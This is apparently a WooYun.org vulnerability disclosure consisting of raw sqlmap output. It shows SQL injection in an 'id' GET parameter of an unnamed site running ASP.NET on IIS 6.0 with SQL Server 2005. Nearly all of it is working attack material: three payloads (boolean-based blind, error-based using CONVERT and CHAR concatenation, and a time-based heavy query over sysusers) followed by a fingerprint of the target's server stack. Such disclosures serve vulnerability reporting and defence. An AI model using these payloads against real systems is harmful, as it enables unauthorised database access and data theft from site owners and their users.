WooYun.org

sqlmap identified the following injection points with a total of 54 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=20104774444030%' AND 5635=5635 AND '%'='&orderid=1
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: id=20104774444030%' AND 5564=CONVERT(INT,(SELECT CHAR(113)+CHAR(101)+CHAR(121)+CHAR(99)+CHAR(113)+(SELECT (CASE WHEN (5564=5564) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(117)+CHAR(100)+CHAR(111)+CHAR(113))) AND '%'='&orderid=1
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
    Payload: id=20104774444030%' AND 6250=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND '%'='&orderid=1
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2005